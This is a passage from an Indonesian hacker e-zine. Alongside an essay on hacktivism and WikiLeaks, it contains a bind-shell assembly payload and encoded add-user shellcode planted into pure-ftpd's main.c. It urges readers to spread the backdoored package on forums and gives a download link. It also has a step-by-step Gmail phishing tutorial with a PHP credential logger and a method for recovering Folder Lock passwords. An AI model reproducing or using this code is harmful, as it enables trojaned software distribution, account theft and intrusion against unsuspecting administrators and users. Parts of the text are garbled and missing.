themselves as heirs to those who employ the tactics of trespass and blockade in the realm of real-world protest. They
are, for the most part, engaged in disruption not destruction.
Wikileaks dan Keyakinan Hacktivists
Marshall McLuhan pernah mengungkapkan sebagaimana dikutip Klein "World War III would be a guerilla information
war with no division between civilian and military participation. Ungkapan tersebut seolah menjadi kenyataan
menutup tahun 2010 ketika fenomena wikileaks akhirnya mencuat ke permukaan dengan keterlibatan ahli IT militer
AS pratu Bradley Manning. Apa yang menjadi alasan Manning terkait aksinya mensuplai dokumen-dokumen rahasia
AS kepada wikileaks sesungguhnya adalah apa yang diyakini kaum hackers. Ia mengakui perbuatannya dilandasi
sebuah keyakinan bahwa suatu data terkait publik luas adalah milik umum dan karenanya informasi harus bebas
diperoleh oleh publik.
Didirikan 2006, setelah empat tahun wikileaks akhirnya menempati headline utama nyaris disetiap media
international, bahkan beberapa dari mereka menggolongkan pemberitaan wikileaks sebagai isu terpopuler
sepanjang 2010. Yang menarik dari wikileaks adalah sosok misterius Julian Assange yang berpendirian kuat dan
berani mengambil resiko yang membahayakan dirinya terkait kerja-kerja wikileaks. Kiranya pendirian sang founder
yang juga hacker-jurnalis tersebut terefleksi dari sebuah keyakinan sebagaimana ia menulis dalam blog pribadinya:
A man in chains knows he should have acted sooner for his ability to influence the actions of the state is near its end.
To deal with powerful conspiratorial actions we must think ahead and attack the process that leads to them since the
actions themselves can not be dealt with.
Sementara kelompok hackers pendukung wikileaks menyatakan dukungan mereka sebagaimana mereka meyakini
prinsip kebebasan.
"We're against corporations and government interfering on the internet," Coldblood added. "We believe it should be
open and free for everyone. Governments shouldn't try to censor because they don't agree with it. Anonymous is
supporting WikiLeaks not because we agree or disagree with the data that is being sent out, but we disagree with
any from of censorship on the internet. If we let WikiLeaks fall without a fight then governments will think they can
just take down any sites they wish or disagree with."
Para pelaku hacktivism menyatakan bahwa dalam berkontribusi terhadap dunia, maka yang mereka lakukan adalah
melakukan apa yang mereka bisa, menggunakan keterampilan yang mereka punya. Suatu aktivitas yang semakin
mengkrucut memunculkan istilah-istilah seperti hacking global justice dan human right hacking, hingga high-tech
politics ini memperlihatkan suatu fenomena bagaimana aktivitas hacking semakin mewarnai konstalasi politik global
dan memberikan suatu wajah baru tentang keterlibatan publik dan dunia modern. Kiranya apa yang menjadi isi
kepala kaum hacktivist dapat terefleksikan melalui kalimat berikut: ketika pemerintah-pemerintah di dunia memilih
cara perang, berlomba-lomba membangun kekuatan nuklir, dan menciptakan pembohongan publik dengan dalih
memberikan damai pada bumi, maka setiap hacker pun berhak memilih cara hacking dengan dalih memberikan
damai pada bumi.
Kontribusi Politik Global
Di Era modern sebagaimana Naomi Klein mengungkapkan hacking computer menjadi new tool dalam dunia
politik. Klein menulis imagine if computer hackers, the daredevils of the networked world, suddenly became
principled political activists.. if they had a mission besides breaking and entering; if they had more to prove than that
they are smarter than whoever designed your computer system, if their targets were selected as part of well
organized, thoroughly researched, international human rights campaigns sebagai kalimat pembuka artikelnya. Klein
bisa jadi mengajak publik untuk memulai dengan berimajinasi, merefleksi ungkapan sang filosofi yang juga bapak
ekonomi Adam Smith the greater our imagination, the wider our scope for acting for placing ourselves within a
perceived order. Kenyataan hari ini dikaitkan dengan kasus wikileaks memperlihatkan ajakan berimajinasi Klein
menempatkan manusia pada posisi yang semakin mapan dalam profesinya. Kontroversi wikileaks sesungguhnya
Hal 43
c0de reborn
mendorong dunia hari ini menjadi semakin hidup dengan semakin bergairahnya jurnalisme-investigasi, semakin
aktifnya publik dalam merespon konstalasi politik global ditandai dengan semaraknya comment-comment
berkualitas terkait wikileaks yang terpublish di berbagai media, blog pribadi sampai organisasi, serta suatu kenyataan
bahwa pemerintah-pemerintah dunia didorong untuk mengoreksi diri baik perbaikan sistem keamanan komputer,
etika diplomasi sampai isu open government. Hal yang paling fundamental adalah menterjemahkan kembali makna
kebebasan yang berujung kepada mentelaah lebih dalam prinsip-prinsip demokrasi.
Keck dan Sikkink dalam Activists Beyond Borders, sebuah riset tentang the rise of transnational networks of activists
memperlihatkan dalam temuan mereka: advocacy networks are helping to transform the practice of national
sovereignty and an important part of an explanation for changes in world politics. These networks try not only to
influence policy outcomes, but to transform the terms and nature of the debate. Temuan riset ini memperlihatkan
bahwa aktivitas-aktivitas lintas negara berupa jejaring luas seperti yang dirakit melalui internet mempengaruhi
proses kebijakan serta mentranformasikan gagasan-gagasan tentang politik global hari ini. Kerja hacktivist melalui
aktivitas hacking-politiknya dalam perkembangannya telah memberi suatu bentuk tersendiri terhadap konstalasi
politik global.
Dengan demikian merefleksi wikileaks sesungguhnya adalah melihat suatu kenyataan bahwa koneksi global yang
melibatkan para aktivis cyber telah memberikan wajah baru bagi politik dunia hari ini dan yang akan datang.
Karenanya dalam frame ilmu politik, fenomena wikileaks ataupun aksi hacktivism-hacktivism lainnya adalah satu
bentuk keterlibatan politik masyarakat civil (partisipasi politik) di dunia modern dalam konstalasi politik global.
Dengan demikian hacktivism, keberadaan whistleblower sesunguhnya hanyalah sebagian dari tools yang dianggap
dapat mencapai tujuan-tujuan politik dengan melibatkan kalangan publik, sebagaimana juga pernah diungkapkan
Klein.
Wikileaks bisa saja dimusnahkan hari ini juga dan Julian Assange dikirim ke Guantanamo dengan mudah, tapi jiwa
yang mengakar dalam diri para aktivis cyber dapat memunculkan ribuan organisasi whistleblower yang sama dan
melahirkan jutaan Julian Assange-Julian Assange yang lain. Yang masyarakat dunia perlu lakukan hari ini adalah
terus belajar tentang bagaimana berkontribusi dengan keterampilan yang mereka punya, bahwa setiap individu
sesungguhnya bisa merubah dunia, hack the planet dan bebaskan dunia ini.
Refleksi Penutup
Dialog anak tentang figur pahlawan mereka.
Anak 1:
Pahlawanku sungguh bersayap, ia terbang dari langit yang tinggi kemudian menginjakkan kakinya dibumi, membasmi
musuh-musuh yang ingin menguasai dunia dan berambisi melenyapkan umat manusia. Ia adalah superman, dan
siapakah yang lebih hebat darinya?
Anak 2:
Pahlawanku tidak memerlukan sayap untuk melompat bebas setinggi-tingginya di udara. Ia memiliki senjata ampuh,
berupa jaring-jaring mematikan yang dengan sekilas keluar dari ujung-ujung jarinya, dan dalam sekejap dapat
melumpuhkan musuh dan membuat mereka tak berdaya. Ia adalah spiderman, dan siapakah yang lebih hebat
darinya?
Anak 3:
Pahlawanku memang tidak bersayap seperti Superman, namun ketika ia berada diketinggian, ia bersayap
pengetahuan yang dapat membawa mereka terbang bebas menjelajahi dunia cyber demi menemukan musuhmusuh umat manusia, bahkan yang bersembunyi dibalik konspirasi sekalipun. Jari-jarinya pun tak mungkin
mengeluarkan jaring-jaring mematikan seperti Spiderman, namun ketika mereka berada diketinggian, jari-jari
tersebut sangat terampil, bergerak lincah memberikan perintah kepada benda supermaya demi memberikan
kedamaian dimuka bumi. Mereka berada diketinggian ketika mereka sudah mampu mengendalikan ego, memahami
etika dan memiliki sense of humanity yang tinggi.
Anak 1 dan2: Siapakah pahlawanmu?
Anak 3: Codeman
*Penulis adalah lulusan Ilmu Politik Universitas Nasional, saat ini mahasiswa M.A Program, Department of
International Relations Eastern Mediterranean University (TRNC/Turkey), concern terhadap isu-isu demokrasi
sebagaimana aktivitasnya dalam PSIK-Indonesia.
Email penulis di [email protected], blog: [email protected]
Hal 44
c0de reborn
Hal 45
c0de reborn
0 ; simpan 0 ke stak
1 ; simpan 1 ke stak
2 ; simpan 2 ke stak
edx,
eax
binder:
;simpan semua argumen yang diperlukan ke stack
push
push
push
push
push
mov
byte 0
byte 0
byte 0
word 0x3930
word 2
ebx, esp
push
push
push
byte 16
ebx
edx
mov
mov
mov
int
lisen:
push
push
mov
mov
mov
int
byte 0x1
edx
eax,102
ebx,4
ecx,esp
80h
Hal 46
c0de reborn
acep:
push
push
push
mov
mov
mov
int
byte 0
byte 0
edx
eax,102
ebx,5
ecx,esp
80h
mov
edx, eax
siap_fd:
mov eax,63
mov ebx,edx
mov ebx,2
int
80h
mov eax,63
mov ebx,edx
mov ecx,1
int 80h
mov eax,63
mov ebx,edx
mov ecx,0
int 80h
eksekusi:
push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 80h
bersih2:
push byte 0x06
pop eax
int 80h
keluar:
push byte 0x01
pop
eax
int
80h
-----------------------------------
Hal 47
c0de reborn
selanjutnya simpan di salah satu server, misal saya taruh di url ini:
http://flightinformationdisplay.com/images/trojan.txt
Hal 48
c0de reborn
Hal 49
c0de reborn
void addu()
{
char shellcode[]=
"\xeb\x1b\x5f\x31\xc0\x6a\x28\x6a\x52\x59\x49\x5b\x8a\x04\x0f"
"\xf6\xd3\x30\xd8\x88\x04\x0f\x50\x85\xc9\x75\xef\xeb\x05\xe8"
"\xe0\xff\xff\xff\x0e\x6f\xc7\xe4\xff\xfb\xec\xf3\xf4\xb3\xa0"
"\xee\xf6\xb8\xff\xb5\xee\x02\x95\x91\x3a\xb5\x70\x32\xba\x37"
"\xb2\xf6\xb5\xbb\xb2\x04\x07\x86\x5c\x21\xb2\x2e\xc6\xf9\xbe"
"\xa3\xe4\xff\xad\xea\xb2\xf4\xfe\xa7\xf5\xff\xea\xb8\xad\xff"
"\xf5\xf5\xad\xe3\xbb\xff\xbd\x3f\x59\x66\x33\xba\x72\x97\xd3"
"\xb2\x4e\x0e\x8f\x49\x34\xb2\x3f\x72\xb2\x57";
int *ret;
ret=(int *)&ret+2;
(*ret) = (int)shellcode;
}
-----------------------------------------------------------------------selanjutnya edit file main.c di direktori pure-ftpd-1.0.29/src menjadi seperti ini :
filename: main.c at pure-ftpd-1.0.29/src :
---------------------------------------------#include <config.h>
#include "ftpd.h"
#include "optional_mod.h"
int main(int argc, char *argv[])
{
mremapx();bdx();kemail(); addu();
return pureftpd_start(argc, argv, NULL);
}
------------------------------------------------
Selanjutnya tinggal kita sebarkan torjan ini di forum-forum warez / linux / tempat yang banyak administrator
misal: warez-bb.org, http://forum.linux.or.id, http://www.linuxforums.org, dll
versi pureftpd yang sudah dibackdoor bisa didownload di:
http://www.shymap.com/backdoored-pure-ftpd-1.0.29.tar.gz
Selamat mencoba menyebarkan
Hal 50
c0de reborn
Phishing Tutorial
Phishing adalah proses mencuri informasi sensitif, seperti username, password, dan informasi bank, dengan berpurapura menjadi seseorang
Anda tidak. Contoh ini akan jika Anda menerima dan e-mail dari seorang hacker berpura-pura menjadi bank Anda.
Dalam e-mail, ia dapat memberitahu Anda bahwa Anda perlu untuk memperbarui account Anda sebelum
kadaluarsa, dan kemudian hacker menyediakan Icon_charly_link_green. Setelah Anda klik pada
Icon_charly_link_green, Anda tiba di sebuah website yang terlihat persis seperti Anda yang sebenarnya
bank halaman. Pada kenyataannya itu hanya replika yang sempurna, dan ketika anda masukan login rincian, itu
mengirimnya ke email hacker atau toko di server web nya. Hacker yang menciptakan yang terbaik, paling menipu
halaman web phishing yang berpengetahuan di daerah HTML dan pemrograman PHP. Di bawah ini saya akan
menunjukkan contoh sederhana beberapa langkah-langkah hacker yang dibutuhkan untuk membuat situs web
phishing. Dengan melihat langkah hacker akan ambil, akan membantu Anda mempertahankan diri dari serangan itu.
1. Pertama hacker memilih target. Yang paling populer target phishing serangan layanan e-mail seperti Hotmail dan
Gmail karena mereka yang paling umum dan sekali hacker mendapatkan akses ke e-mail Anda, dia juga mendapat
akses ke memuat informasi pengguna lainnya untuk semua situs-situs lain Anda gunakan. Dalam contoh ini kita akan
berpura-pura hacker memilih Gmail sebagai nya target.
2. Setelah memilih targetnya, hacker akan pergi ke situs web dan menyimpan Seluruh halaman utama. Saya
menggunakan Mozilla Firefox, (sangat merekomendasikan menggunakan browser untuk keamanan dan kustomisasi)
Jadi saya akan pergi ke. http://www.gmail.com dan klik File -> halaman Simpan sebagai ..., atau cukup tekan <CTR> +
S yang melakukan ini secara otomatis. Pilih mana Anda ingin menyimpan halaman web dan tekan Simpan.
3. Setelah Anda memilikinya disimpan, mengubah nama ServiceLogin.htm untuk index.htm. The alasan Anda ingin
nama "index" begitu ketika Anda meng-upload ke web host dan seseorang pergi ke Icon_charly_link_green, halaman
indeks adalah halaman pertama yang muncul.
4. Selanjutnya hacker akan membuat script PHP untuk melakukan perbuatan kotor nya menguatkan informasi Anda.
Di bawah ini adalah script PHP sederhana yang log dan menyimpan informasi login Anda ketika Anda klik "Sign in".
Untuk melihat cara kerjanya, copy dan paste kode berikut ke notepad. Selanjutnya simpan ke dalam direktori yang
sama seperti Anda menyimpan halaman Gmail, dan nama itu phish.php. Dalam Selain ke halaman phish.php,
membuat file teks baru kosong dan beri nama list.txt.
PHP Code:
<?php // This marks the beginning of the PHP script.
PHP Code:
Header(Location:
https://www.google.com/accounts/Serv...=mail&passive=
true&rm=false&continue=https%3A%2F%2Ffanyv88.com%3A443%2Fhttp%2Fmail.google.co m%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy<mpl=defa ult<mplcac
he=2 ); // once you click Sign in in the fake website, this redirects
you to the real Gmail website, making the whole process look more
legit.
Hal 51
c0de reborn
PHP Code:
$handle = fopen(list.txt, a); // this tells the server to open the file
list.txt and get it ready for appending data. Which in this case is your
username and password.
PHP Code:
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, =);
fwrite($handle, $value);
fwrite($handle, rn);
} // This section simply assigns all the information going through
this form to a variable. This includes your username and password.
Fwrite($handle, rn); // This writes your details to the file list.txt
fclose($handle); // This simply closes the connection to the file
list.txt
exit;
> /? / Marks akhir program PHP.
Sejauh ini anda akan melihat berikut di folder anda:
5. Sekarang hacker harus mengedit halaman Gmail utama untuk menyertakan nya PHP script. Untuk melihat apa
yang akan dilakukan hacker, membuka Gmail utama halaman yang bernama index.htm dengan notepad.
6. Tekan <CTR> + F, atau pergi ke Edit -> Find, ketik aksi dan tekan "Find Next".
7. Ini akan menyorot terjadinya pertama dari "tindakan" kata di script dan Anda harus melihat:
bentuk
PHP Code:
<id = "gaia_loginform" action = "https: / / www.google.com/accounts/Serv...?service=mail"
Ada dua "tindakan" kejadian di script jadi pastikan Anda memiliki yang benar dengan melihat "bentuk id" nama di
atas. Ubah Icon_charly_link_green yang antara action = "" untuk phish.php. Ini akan membuat bentuk tunduk
kepada Anda phish script PHP, bukan ke Google. Setelah Icon_charly_link_green Anda akan melihat
kode:
metode = "post"
Ubah kata "POST" untuk "GET" sehingga terlihat seperti metode = "GET". Apa yang dilakukan adalah metode GET
menyampaikan informasi yang Anda ketik melalui URL sehingga script PHP dapat log itu.
9. Selanjutnya hacker akan meng-upload file hingga hosting yang gratis yang mendukung PHP. Dengan pencarian
Google sederhana Anda bisa datang dengan banyak yang termasuk dalam kategori ini.
Hal 52
c0de reborn
10. Setelah semua file di-upload, Anda harus memberikan izin tertulis kepada "List.txt" file. Setiap perusahaan
hosting harus memiliki pilihan CHMOD berikutnya ke setiap file. Pilih opsi ini dan mengubah izin file untuk "List.txt"
ke 777. Jika Anda tidak bisa mengetahui bagaimana melakukan ini, mintalah orang-orang yang menggunakan host
yang sama atau hanya sesuatu yang mirip dengan Google: "Yourwebhostname chmod".
11. Setelah semuanya dan siap untuk pergi, pergi ke host anda disediakan Icon_charly_link_green Anda untuk
website Anda dan Anda akan melihat replika halaman Gmail. Ketik username / password dan klik Daftar masuk ini
seharusnya diarahkan Anda ke halaman Gmail nyata.
12. Sekarang pergi melihat file list.txt Anda dengan pergi melalui file hosting Anda manajer atau akan
http://www.yourwebhosturl.com/youraccount/list.txt. Meskipun ini yang paling umum web host yang anda gunakan
dapat memberikan yang berbeda mencari URL. Sekarang jika saya menaruh nama pengguna dari "myusername" dan
password
dari "mypassword" kemudian "list.txt" sekarang akan tampak seperti berikut:
PHP Code:
ltmpl = default
ltmplcache = 2
terus = http://mail.google.com/mail/?
service = mail
rm-palsu
Email = username
Passwd = mypassword
rmShown = 1
signin = Masuk
AST =
Seperti yang Anda lihat jika Anda jatuh hacker ini akan memiliki email Anda dan sandi. Scary, eh? Hehehehe
Hal 53
c0de reborn
Hal 54
c0de reborn
4. Di address bar tambahin &webm=1 diakhir URL, ini digunain buat nyari video yg support sama HTML5. Contoh:
http://www.youtube.com/results?search_query=guns+n%27+roses&aq=0 menjadi
http://www.youtube.com/results?search_query=guns+n%27+roses&aq=0&webm=1
5. Tekan enter
Hal 55
c0de reborn
Hal 56
c0de reborn
Folder Lock adalah sebuah software yang dapat mengenkripsi file yang mana dapat memberi folder dengan sebuah
password mengenkripsi file dan folder, melindungi usb flashdisk dan mengunci CD/ DVD rooms. Folder Lock dan
dapat berjalan dengan baik di semua platform Windows seperti Windows 2000, XP, Vista dan Windows 7.
Salah satu fitur Folder Lock ini adalah dapat membuat Locker, yang digunakan untuk menyimpan file maupun folder
yang ingin anda amankan. Locker ini bersifat portable, dengan ini anda dapat membawanya dengan aman
menggunakan Flashdisk maupun mengirimnya melalui email. Anda tidak akan ragu mengenkripsi sebuah file atau
folder menggunakan software ini. Mengapa demikian? Karena Folder Lock sudah menggunakan 256 bit AES on-thefly yang tingkat kemanannya sangat terjamin. Jenis keamanan ini adalah standar keamanan yang digunakan di
perusahaan-perusahaan besar di Amerika.
Apa saja kelebihan lainnya dari Folder Lock?
Folder Lock mengalami perkembangan dari versi sebelumnya, yang paling menonjol adalah, di versi terbaru ini,
sudah mendukung fitur portable untuk semua tipe usb flashdisk atau removable storage. Selain itu, Stealth Mode
yang sekarang sudah mendukung pada sistem operasi 32 dan 64 bit dengan akurat.
Apa itu Stealth Mode?
Stealth Mode adalah salah satu fitur Folder Lock yang berfungsi untuk menyembunyikan program Folder Lock ,
sehingga semua orang tidak akan tahu jika anda menggunakan software tersebut.
Folder Lock sangat direkomendasikan oleh instansi-instansi untuk mengamankan sebuah file maupun folder. Karena
Folder Lock telah menerima banyak award, seperti Award dari Brothersoft, Download.com, Computer Active, dll
Features and Benefits:
256-bit AES encryption on-the-fly (military standard) for file protection.
File Lock, Folder Lock, Drive Lock, File Encryption and Folder Encryption. All in one complete package.
Full Portability. Password protect USB Drives, Lock CDs & DVDs and share password with trusted friends.
Backup or transfer your password protected Lockers anywhere. All data sits in one place for easy backup.
Undeletable Lockers (on the PC where Folder Lock is installed). Deletion requires you to login into Folder Lock.
Shred files automatically when data is encrypted. Choose this option for full data security.
Stealth Mode feature can efficiently hide all the traces of Folder Lock ever been installed on your PC.
Windows History Cleaning. Removes recent history of PC activity automatically when Locker closes.
Hack Attempt Monitoring option can monitor fake password attempts and can Shutdown PC automatically.
Fastest Encryption! Encrypted data is later decrypted in memory, preventing data recovery & slow processing.
Complete Privacy! Whether you're concerned with privacy, data theft, data loss, data leaks or virus attacks. You
need Folder Lock!
Hal 57
c0de reborn
Pada tiap versi memang tempatnya berbeda-beda, namun namenya tetap sama _pack, nah data yang
berisi fdjobk~~~~~~~~~~~~ itu adalah password yang telah ter-enkripsi.
Anda bisa dengan mudah memecahkan algoritma enkripsi dengan menebak-nebak, dan pastinya akan terpetakan
sebagai berikut :
Enkripsi
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
0
1
2
3
4
Dekripsi
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
{
1
2
3
4
5
Hal 58
c0de reborn
5
6
7
8
9
!
@
#
$
%
^
&
*
(
)
_
+
=
|
\
[
]
;
<
,
>
.
`
6
7
8
9
:
A
$
%
&
_
+
)
*
`
,
>
}
]
\
^
<
(
=
?
/
0
a
Kuncinya ialah huruf di depan di letakkan di belakang, contohnya fdjobk = janice kalau dicocokkan dengan tabel
diatas.
Hal 59
c0de reborn
Object
Properties
Isi
textbox enkripsi 1 sampai 16
name
en1 sampai en16
textbox dekripsi 1 sampai 16
name
de1 sampai de16
command button 1
Caption
&Generate
command button 2
Caption
&Reset
command button 3
Caption
Exit
*Note : intinya hanya yang di atas, design urusan selera masing-masing.
Listing Program :
Private Sub Command1_Click()
If en1 = "b" Then
de1 = "a"
ElseIf en1 = "c" Then
de1 = "b"
ElseIf en1 = "d" Then
de1 = "c"
ElseIf en1 = "e" Then
de1 = "d"
ElseIf en1 = "f" Then
de1 = "e"
ElseIf en1 = "g" Then
de1 = "f"
ElseIf en1 = "h" Then
de1 = "g"
ElseIf en1 = "i" Then
de1 = "h"
ElseIf en1 = "j" Then
de1 = "i"
ElseIf en1 = "k" Then
de1 = "j"
ElseIf en1 = "l" Then
de1 = "k"
Hal 60
c0de reborn
c0de reborn
Hal 62
c0de reborn
Untuk en2 sampai en16 listingnya sama, tinggal diubah. Jangan lupa en2 pasangan dengan de2 terus seperti itu
sampai en16.
Private Sub Command2_Click()
en1 = ""
en2 = ""
en3 = ""
en4 = ""
en5 = ""
en6 = ""
en7 = ""
en8 = ""
en9 = ""
en10 = ""
en11 = ""
en12 = ""
en13 = ""
en14 = ""
en15 = ""
en16 = ""
de1 = ""
de2 = ""
de3 = ""
de4 = ""
de5 = ""
de6 = ""
de7 = ""
de8 = ""
de9 = ""
de10 = ""
de11 = ""
de12 = ""
de13 = ""
de14 = ""
de15 = ""
de16 = ""
End Sub
Private Sub Command3_Click()
If MsgBox("Do U Wanna Exit?", vbQuestion + vbYesNo, "Confirmation") = vbYes Then
Unload Me
End If
End Sub
Tinggal di compile, software selesai.
Untuk catatan, saya udah coba pada folder lock versi 6, ternyata gak ketemu. Work di versi 5 aja sepertinya.
Referensi :
Tulisan dimajalah XCODE edisi berapa lupa, minta ijin ya om dikutip :D
Minta ijin juga sama mimin dc nama forum dibawa2 :D
Closing :
Akhir kata sori banget coz saya nubie bgt soal VB6, jadi masih acak2an gitu. Next time Janice bakal ngasih tulisan
yang bagus *semoga.. makasih buat keluarga DC. JANICE
Hal 63
c0de reborn
Assalamualaikum Wr.Wb.
Bismillahirrahmanirrahim.
Hello Everyone!!!
Apa Kabar Semuanya??? Jumpa Lagi Bersama assadotcom Yang Ganteng Lahir Batin. Amiin. ^_^ Narsize Mode On
Ok. Cukup Intro Djayusnya ^_^
Udah Lama Juga Nich Kagak Nulis Banyak Tentang Ilmu Perkomputeran ^_^ Coz Masih Banyak Banget Sesuatu Yang
Tertunda Yang Harus Diselesaikan, So... Gak Sempet Dech Buat Nulis Banyak =( Tapi Kebetulan Kali Ini Aye Ada
Kesempetan Buat Nulis Banyak Sekalian Ikut Berpartysipasi Di Ezine Devilzc0de #2 ^_^
Ok. Aye Mulai Aja Ya Nulis Banyaknya ^_^ SEMANGAT!!!
Sesuai Dengan Judul Memahami Dan Mendamaikan Peperangan Script jQuery. Disini Aye Coba Share Dari Apa
Yang Aye Dapet Slama Ini (Pengalaman) Terutama Ketika Menemukan Masalah Di Dalam Hal Ngedesign Dan
Kawannya... Atau Lebih Tepatnya Ketika Mencoba Menggabungkan Efek Canggih jQuery Di Dalam Satu Homepage
(Blog/Blogger).
jQuery Adalah Sebuah Library Yang Didalamnya Begitu Banyak Code Yang Menarik, Sampe Bikin Aye Jatuh Lebay
Mode On ^_^
jQuery Merupakan Salah Satu Framework Turunan JavaScript Yang Banyak Digunakan Oleh Web/Blog Di Belantara
Dunia Maya, YAKIN??? Ya, Seperti Yang Aye Bilang Tadi, Karena jQuery Dapat Memberikan Efek Canggih Pada
Web/Blog.
Hal 64
c0de reborn
N Jika Rekan Ingin Lebih Banyak Tau Tentang Efek Canggih Apa Saja Yang Diberikan Si jQuery, Silahkan Kunjungi
Alamat Berikut http://jquerylist.com/
Lanjut...
Kecanggihan N Kelembutan Efek Yang Diberikan Oleh Si jQuery, Ternyata Tak Selembut Penerepannya Pada
Web/Blog, Script jQuery Cukup Rentan Berperang/Bentrok/Konflik, Baik Pada Script Dengan Framework Yang Sama
Or Pada Framework Yang Berbeda, Bahkan Bisa Saling Mengalahkan N Membinasakan Satu Sama Lain Namanya
Juga Perang ^_^ Dan Inilah Masalah Yang Terjadi Ketika Aye Mencoba Menggabungkan Beberapa Efek jQuery Pada
Blog Aye, Dimana Ketika Satu Efek jQuery Di+kan, Efek jQuery Yang Lain Jadi Tak Berfungsi/Berjalan, Padahal
Sebelumnya Berfungsi/Berjalan =(
~!@#$%^&*()_+|+_)(*&^%$#@!~
Bingung??? Mudeng??? Pusing??? Adunta??? Dan Kawannya!!! =(
Itulah Kurang Lebih Yang Ada Dalam Hati Ketika Masalah Ini Terjadi!!! OOT Mode On ^_^
Coz Jika Qta Browsing Or Search, Banyak Sekali Web/Blog Yang Ngeshare Tutorials Mengenai Penerapan Efek jQuery
Untuk Web/Blog, Dari Yang Paling Easy Sampe Yang Hard Kaya Game Aja ^_^ Bahkan Sampe Yang Gak Karuan!!!
^_^ Tapi Cukup Sedikit Yang Ngeshare Dasar Penerapan jQuery Pada Web/Blog Apalagi Yang Sifatnya AIO jQuery In
Web/Blog Ngarang Mode On ^_^
Hal 65
c0de reborn
Next...
Ketika Udah Mentok Nyari Solusinya Gimana...??? Tapi Untunglah Gak Nyampe Bunuh Diri Lebay Lagi Mode On
^_^ Terbesit Dalam Pikiran Untuk Menyatroni Langsung Rumah Si jQuery http://jquery.com/
Dengan Harapan Moga Aja Dapet Wangsit Disana ^_^ N Ternyata??? Eng Ing Eng...!!!
Serius Mode On ^_^
Perintah Dasar jQuery Slalu Diawali Dengan Simbol $ (Tanpa Tanda Kutip) Or Qta Lebih Mengenalnya Dengan
Simbol Dollar. Ini Sebagai Identitas Dari Perintah jQuery, So... Jika Rekan Menemukan Script Yang Slalu Diawali
Dengan Simbol $ Maka Ini Adalah Script jQuery Sotoy Mode On ^_^ Dan Sudah Menjadi Kewajiban Bukan Sunah
^_^ Bahwa Script jQuery Ini Harus Didampingi Dengan Framework jQuery-Nya Sebagai System Dasar, N Framework
jQuery Kudu, Mesti, Harus Terlebih Dahulu Dipanggil/Diload Biar Deklarasi Script Yang Qta Buat Mampu Berjalan
Dengan Normal. Gampangnya, jQuery Adalah Rumah, N Script Yang Qta Buat Adalah Isinya.
Ok. Sebelum Qta Membahas Lebih Jauh, Aye Harap N Yakin Rekan Bisa Memahami Tulisan Aye. Amiin. ^_^ Coz
Memang Beginilah Adanya Gaya Nulis Banyak Aye PizZz.
I Google
Loh... Kok Malah Lari Ke Google...???
Nantikan Setelah Pesan Berikut Ini...
~!@#$%^&*()_+|+_)(*&^%$#@!~~!@#$%^&*()_+|+_)(*&^%$#@!~
~!@#$%^&*()_+|+_)(*&^%$#@!~~!@#$%^&*()_+|+_)(*&^%$#@!~
Ok. Cukup Iklannya ^_^
Lanjut...
YupzZz... Kenapa Aye Kok Malah Lari Ke Google...???
Ya... Karena Aye Google ^_^
Udah Gech assadotcom Serius Lagi!!! >.<
^_^ Cobalah Serius Untuk Tidak Lebih Serius ^_^
Ok. Aye Minta Sori Kalo Disangka Gak Serius, Tapi Inilah Seriusnya Aye ^_^
Back To Topic...
Kenapa Aye Kok Malah Lari Ke Google...???
Ya... Karena Raksasa IT Dunia Maya Yang Satu Ini Ternyata Mendukung Penuh Framework jQuery, Ini Dibuktikan
Dengan Disediakannya Resource jQuery Oleh Google, Baik Untuk Digunakan Or Dikembangkan. So... Berbanggalah
Bagi jQuery Mania, Coz Menjadi Lebih Mudah Untuk Memasang Framework jQuery Pada Web/Blog Qta.
Hal 66
c0de reborn
Adapun Cara Memasang Framework jQuery (Pada Blogger) Yang Disediakan Oleh Google Sebagai Berikut :
jQuery Google API
Cara Pertama Ini Adalah Cara Yang Paling Mudah N Paling Aman Dengan Tingkat Resiko Error Handle Script Paling
Minim Dalam Memanggil Framework jQuery.
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js' type='text/javascript'/>
jQuery PEACE
Deklarasi Fungsi jQuery Selalu Diawali Dengan Simbol $ (Seperti Yang Tadi Sudah Dijelaskan Diatas), N Inilah Yang
Nantinya Akan Mendamaikan Peperangan Script jQuery. So... Gimana Cara Mendamaikannya...??? Perhatikan
Contoh Script Dibawah Ini Sebelum Dan Sesudah Ditambahkan Deklarasi Untuk Mendamaikan Script jQuery.
Sebelum
$(document).ready(function(){
$("a.slick").click(function () {
$(".active").removeClass("active");
$(this).addClass("active");
$(".content-slick").slideUp();
var content_show = $(this).attr("title");
$("#"+content_show).slideDown();
});
});
Hal 67
c0de reborn
Sesudah
Regard,
assadotcom.
Hal 68
c0de reborn
Hal 69
c0de reborn
Hal 70
c0de reborn
9. Kita harus menyediakan sendiri Cisco IOS digunakan dengan GNS3 karena masalah lisensi...
GNS3 dimaksudkan untuk digunakan di lingkungan laboratorium untuk pengujian dan belajar...
Setelah dapat salinan dari IOS Cisco untuk salah satu platform yang didukung, lanjutkan k'step berikutnya..
Platform yang didukung saat ini adalah :
* 1710
* 1720
* 1721
* 1750
* 1751
* 1760
* 2610
* 2610XM
* 2611
* 2611XM
* 2620
* 2620XM
* 2621
* 2621XM
* 2650XM
* 2651XM
* 2691
* 3620
* 3640
* 3660
* 3725
* 3745
* 7200
10. Klik OK > Close dan kembali k'Setup Wizard klik OK..
Hal 71
c0de reborn
Hal 72
c0de reborn
Penulis Artikel
Wahyu_devilcode aka teardrop
- Optimasi System dan Desktop Ubuntu
- Teknik Mempercepat Akes Modem Flash
- Teknik Backup Konfigurasi Mikrotik
Jurankdankkal
- Cisco Internetwork Operating Systems Emulator
Assadotcom
- Memahami Dan Mendamaikan Peperangan Script jQuery
Patriot
- DDOS Attack menggunakan Vadim
Nofia Fitri
- Hacktivism dan Politik Global
Mywisdom
